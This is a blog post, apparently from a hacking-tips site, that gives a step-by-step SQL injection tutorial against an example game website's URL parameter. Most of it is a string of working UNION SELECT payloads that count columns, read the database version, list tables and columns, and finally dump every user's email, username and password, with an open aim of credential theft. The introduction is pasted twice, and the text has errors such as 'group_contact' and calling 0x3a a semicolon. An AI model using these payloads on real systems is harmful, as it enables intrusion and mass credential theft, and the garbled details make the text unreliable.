Kamis, 25 November 2010

Regular SQL Injection

First thing you need to know, is that SQL can be tricky sometimes. Even if something looks vulnerable, it isn't always, but that works the othe way around too.

There are a few different types of SQLi, they are. Regular SQLi, Blind SQLi, Advanced SQLi, Indepth SQLi, Extensive SQLi, and Deep SQLi.

Now, what ways can we use an SQLi?
Well, there are URL, Input validation boxes/forms. Those are the most common two. But it's also possible to do via XSSRFILFI, and so on.

What can we gain from a successfull SQLi?
Database access.. Which is pretty much everything on the web server.

This can be both useful and dangerous. If you were a web admin, and forgot your login cradentials, you could use an SQLi exploit that you had hidden for just this, but I wouldn't recomend this. But, if a hacker were to locate this, he could use the same thing to get your password, and every password on the database.

But how does it work?
Well, I'll explain it like this.
So, lets pretend the DB(Database) is a cookie monster, and you're the person who wants some information out of the cookie monster. But, the cookie monster only gives this info to people who give him "god cookies". But, alas you don't know how to make those cookies. So, you try giving him a vanilla cookie. Well, the cookie monster is alergic to vanilla, so he says **** you. Now what? Well, you can SQLi him. How do I do this? Well, you take your vanilla cookie and some magic sprinkles to it to make it a "god cookie". Now, once the cookie monster eats this cookie, he will be under our controll. Now, we can get whatever info we want.

Now, say we want to get access to an admin page, what would we do?
Well, the first thing we would do is check if it has any sort of input validation. To do this, we could test the inputs, and hope its vulnerable, or, we could take a look at the source. Sometimes when we look at the source, and we see that the web dev was stupid. Which, works perfectly for us.

So, lets say we want to exploit this via the URL, how would we do this?
Well, we would look for a page that calls another page for info. Like, a game website.


Code:http://gamewebsite.com/game.php?game=184

There are a few different types of SQLi, they are. Regular SQLi, Blind SQLi, Advanced SQLi, Indepth SQLi, Extensive SQLi, and Deep SQLi.

Now, what ways can we use an SQLi?
Well, there are URL, Input validation boxes/forms. Those are the most common two. But it's also possible to do via XSS, RFI, LFI, and so on.

What can we gain from a successfull SQLi?
Database access.. Which is pretty much everything on the web server.

This can be both useful and dangerous. If you were a web admin, and forgot your login cradentials, you could use an SQLi exploit that you had hidden for just this, but I wouldn't recomend this. But, if a hacker were to locate this, he could use the same thing to get your password, and every password on the database. 

But how does it work?
Well, I'll explain it like this. 
So, lets pretend the DB(Database) is a cookie monster, and you're the person who wants some information out of the cookie monster. But, the cookie monster only gives this info to people who give him "god cookies". But, alas you don't know how to make those cookies. So, you try giving him a vanilla cookie. Well, the cookie monster is alergic to vanilla, so he says **** you. Now what? Well, you can SQLi him. How do I do this? Well, you take your vanilla cookie and some magic sprinkles to it to make it a "god cookie". Now, once the cookie monster eats this cookie, he will be under our controll. Now, we can get whatever info we want.

Now, say we want to get access to an admin page, what would we do?
Well, the first thing we would do is check if it has any sort of input validation. To do this, we could test the inputs, and hope its vulnerable, or, we could take a look at the source. Sometimes when we look at the source, and we see that the web dev was stupid. Which, works perfectly for us. 

So, lets say we want to exploit this via the URL, how would we do this? 
Well, we would look for a page that calls another page for info. Like, a game website.


Code:
http://gamewebsite.com/game.php?game=184
We see that, and are like. Well this could be exploitable. So, we just add a ' to the end. So, we'll assume we get an SQL error, or there is data missing from the page. Perfect, we know its vulnerable. But, now what do we do? Well, we would use the ORDER BY command to see how many columns are in the DB. To do with, we would take the original URL, and do this:
Code:
http://gamewebsite.com/game.php?game=184+ORDER+BY+10--
Another way to see if a website is vulnerable to regular SQLi without the ' at the end, is to add +ORDER+BY+99999999999999999999999999-- to the end of the url. If an error shows, its vulnerable. If not, chances are they are filtering input, and it's not vulnerable to regular SQLi.

That, would do one of two things.
1) The page would load normally.
2) We would get an error.

If we get an error, we know there are less than that many columns. If it loads normally, we keep going higher until we find an error. So say the lowest number we can get an error at is 4, well, then we know there are 3 columns, and 4 doesn't exist (which is why we got the error).


Now, onto finding the vulnerable column. Get rid of the +ORDER+BY in the URL, and replace it with +UNION+SELECT



Code:
http://gamewebsite.com/game.php?game=184+UNION+SELECT+1,2,3--
(There are 3 columns).

Once we send that, it should dispay a number on the page (it will be either 1,2,3). If no error displayed, that's okay. Some websites require you to null the value you are injecting into. So the new URL would be:



Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3--
All we did was add the - before 184

So, lets assume that the page displayed a 2, that would mean that the second column is vulnerable.

Now, we need to find the SQL version. How do we do this?
Its quite simple actually. We just use the @@version command. This should return either a version 4.x or 5.x. To inject the @@version command, we would change the vulnerable column to that.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,@@version,3--
If the page loads completely normal, its alright. We sometimes need to convert the function in order for the SQL server to understand the command. This is usually the only thing that will need to be converted. But it's even rare that this needs to. So, if we didn't get the version number from the above command, then we would change it to:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,convert(@@version using latin1),3--
And, if that even doesn't return the version, then we will also need to HEX the page. 

Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,unhex(hex(@@version)),3--
That there, should show us the SQL version. It will either be version 4 or 5 something, like I said before.

Now, version 4 is more of a pain in the ass, or most people think. Most guides and such don't show people how to get the table names from a version 4 sql db. But, we will be. The URL will be alot longer in this case.


Code:


http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--
That there should show the table names.. But, if it doesn't you are going to have to start guessing, which is why it's a pain in the ass..

How do we do this? well, we take our original URL and add: from *table name*

Common table names are: 

Code:
tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins
Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admin
We get an error which means it doesn't exist.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from user
We get another error..


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admins
Still error.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from users
No error. So, we know the table users exists.

Now, we need to quess colimn names from the table we just figured out. Column names within this table would most likely be like:
first_name, last_name, email, username, password, pass, user_id
You have to use common sense in alot of this. Now we go back a few steps, and remember which column was vulnerable (2). So we replace the 2 with the column name you are hoping exists in the users table.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,first_name,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,last_name,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,address,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,username,3 from users
No error.. So we know username exists. Now, we would want to see if the password column exists to for obvious reasons.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,password,3 from users
No error. That's good. Now, lets see if we can get the email address too.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email,3 from users
Error.. Well ****..


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email_address,3 from users
No error, perfect. 


Code:So we can see that in the table users, we can extract the email, username, and password.
Doing it like this, will display the first line of information, which is normally the admin login. If we only wanted to get the admin's login info, we would use the contact() command. To do so, we would so womthing like:



Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,contact(email,0x3a,username,0x3a,password),3 from users
The 0x3a is there, because its the hex value of a semi-colon.

That there, would show the email, username, then password of the first user on the DB.

But of course, we want more than the admin's info. We want everyones. How else would we make a good login dump. To all the info from the columns we want to, we then have to use the group_contact() command. 


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from users
That there would display all the emails, then usernames, then passwords of everything in the users table. 

Okay, now, if instead of getting a version 4, we got version 5, we would be very happy. Because 5 is the easist one to hack. 

So, we want to get the table names. This time though, we don't have to guess. The URL would look something like this when exploiting it:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,table_name,3 from information_schema.tables
That would display the first table name. Which again, we want more. So, what do we do? We use the group_concat()


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables
Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

An example of this is:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables+where+table_schema=database()
All the tables from the primary DB should be displayed there. Some of which could be:


Code:About, Admin, Admins, User, Users, Affiliates, Access, Customer, etc
No, we want to extract the data from those tables. Lets assume that there was just the users table. Well, we will change the data in the vulnerable column fom table_name, to column_name


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=*Hexed table name*
So, if were were to try:

Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=Users
We would get an error, because we didn't HEX the table_name at the end. So, I hex my table name: Users: 5573657273. I used Convert String To Hexadecimal Online but there are many others.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=5573657273
That there would again, give us an error, because e have to add the MYSQL Intiger right before the hex


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=0x5573657273
Then, that would display all the columns under the table name of: Users.

In this example, we will assume that first_name, last_name, email, username, password, and email are displayed. So, we would go back in the tutorial into if it was version 4, and it would be formed the same as the final command in there.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from Users
That's about it for regular sqli.


HOPE You like all these article on website hacking , pass the comments




  to get all latest hacking tips n tricks  directly to ur inbox
Diposting oleh meg
Label:

0 komentar:

Posting Komentar